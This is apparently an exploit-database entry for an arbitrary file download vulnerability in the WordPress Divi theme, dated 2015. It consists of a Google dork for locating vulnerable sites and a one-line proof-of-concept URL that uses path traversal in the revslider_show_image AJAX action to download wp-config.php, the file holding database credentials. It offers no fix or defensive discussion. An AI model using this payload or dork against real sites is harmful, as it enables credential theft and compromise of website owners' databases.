id: 23266
date: 02/09/2015
title: Wordpress Theme Divi Arbitrary File Download Vulnerability
author: pool
cves: 

# Exploit Title: Wordpress Theme Divi Arbitrary File Download Vulnerability
# Date: 08/02/2015
# Exploit Author: pool and Fran_73
# Vendor Homepage: http://www.elegantthemes.com/gallery/divi/
# Contact : ricof81@yahoo.com ( YM )
# Tested on: Linux / Window
# Google Dork: inurl:wp-content/themes/Divi/
######################
# PoC
http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#  0day.today [2023-03-25]  #